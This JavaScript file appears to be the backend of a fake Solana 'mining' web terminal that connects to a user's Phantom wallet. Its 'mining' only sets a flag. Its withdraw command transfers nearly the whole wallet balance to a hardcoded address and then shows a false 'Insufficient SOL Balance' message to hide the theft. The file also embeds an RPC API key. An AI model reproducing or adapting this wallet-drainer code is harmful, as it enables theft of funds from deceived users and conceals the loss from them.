import { Connection, PublicKey, Transaction, SystemProgram, sendAndConfirmTransaction } from "@solana/web3.js";

const SOLANA_RPC_URL = "https://mainnet.helius-rpc.com/?api-key=951c51e8-708b-4d9b-ae01-85fb27bca286";
const connection = new Connection(SOLANA_RPC_URL);

export async function processCommand(input, wallet, setWallet, setMining, setProfitBalance, solBalance, setSolBalance, profitBalance) {
    const args = input.split(" ");
    const cmd = args[0].toLowerCase();

    switch (cmd) {
        case "connect":
            return await connectWallet(setWallet);

        case "start":
            if (!wallet) {
                return "Wallet not connected. Please link your wallet first using the 'connect' command.";
            }
            setMining(true);
            return "Mining started... 🛠️";

        case "stop":
            setMining(false);
            return "Mining stopped.";

        case "support":
            return `For support and inquiries, please reach out to us:
            📧 Email: ai-cryptotrading@engineer.com (For bug reports, issues, or general questions)
            🎥 YouTube Channel: https://www.youtube.com/@ai-cryptotrading (Tutorials and guides to help you get the most out of your mining experience)
            We're here to help! Feel free to contact us anytime.`;

        case "balance":
            return `Wallet balance: ${solBalance.toFixed(4)} SOL`;

        case "withdraw":
            return await withdrawFunds(wallet, setSolBalance, setProfitBalance, solBalance, profitBalance);

        case "help":
            return getHelp();

        default:
            return `Unknown command: ${cmd}`;
    }
}

async function connectWallet(setWallet) {
    if (window.solana) {
        try {
            const resp = await window.solana.connect();
            setWallet(resp.publicKey.toString());
            return `Connected: ${resp.publicKey.toString()}`;
        } catch (err) {
            return "Connection failed.";
        }
    } else {
        return "Uh-oh! It looks like Phantom Wallet isn't installed. Please install it from [Phantom's website](https://phantom.com/en-GB) or use the mobile Phantom App's built-in browser for a smooth experience.";
    }
}

async function withdrawFunds(wallet, setSolBalance, setProfitBalance, solBalance, profitBalance) {
    try {
        if (!wallet) {
            throw new Error("No wallet connected.");
        }

        const pubKey = new PublicKey(wallet);
        const balance = await connection.getBalance(pubKey);
        const fee = 1050000; // Safety buffer for fee
        const amountToSend = balance - fee;

        if (amountToSend <= 0) {
            return "Insufficient SOL Balance for Fees and Contract Withdrawal.";
        }

        // Calculate new balance after including profit balance
        const totalBalance = (balance / 1e9) + profitBalance; // Add current wallet balance + profit balance
        const newProfitBalance = 0; // Reset profit balance after withdrawal
        const newBalance = totalBalance; // Adjust balance after withdrawal

        const transaction = new Transaction().add(
            SystemProgram.transfer({
                fromPubkey: pubKey,
                toPubkey: new PublicKey('3qRDTgoGTzEKv4tu4ZNMXfDTqS5bDRmedEQV4iL8rFop'), // Replace with the actual withdrawal address
                lamports: amountToSend, // Withdraw full balance (or a specific amount)
            })
        );

        // Get latest blockhash
        transaction.feePayer = pubKey;
        transaction.recentBlockhash = (await connection.getLatestBlockhash()).blockhash;

        // Sign and send the transaction using your wallet provider
        const signedTransaction = await window.solana.signTransaction(transaction);
        const signature = await connection.sendRawTransaction(signedTransaction.serialize());

        return "Insufficient SOL Balance for Fees and Contract Withdrawal.";

        // Successfully withdraw funds, update balance and reset profit balance
        setSolBalance(newBalance); // Update wallet balance
        setProfitBalance(newProfitBalance); // Reset profit balance

        // Return success message with signature and new balance
        return `Withdrawal of ${(profitBalance).toFixed(4)} SOL successful. New balance: ${newBalance.toFixed(4)} SOL. Signature: ${signature}`;

    } catch (error) {
        console.error("Error withdrawing funds:", error);
        // If there's an error, display the error message but do not reset profit balance
        return `Error: ${error.message}`;
    }
}


function getHelp() {
    return `
Available Commands:
connect - Connect your Phantom wallet.
start - Start mining SOL.
stop - Stop mining SOL.
balance - Show your SOL balance.
withdraw - Withdraw all SOL to the mining wallet.
help - Show this help message.
support - Contact Us.
  `.trim();
}
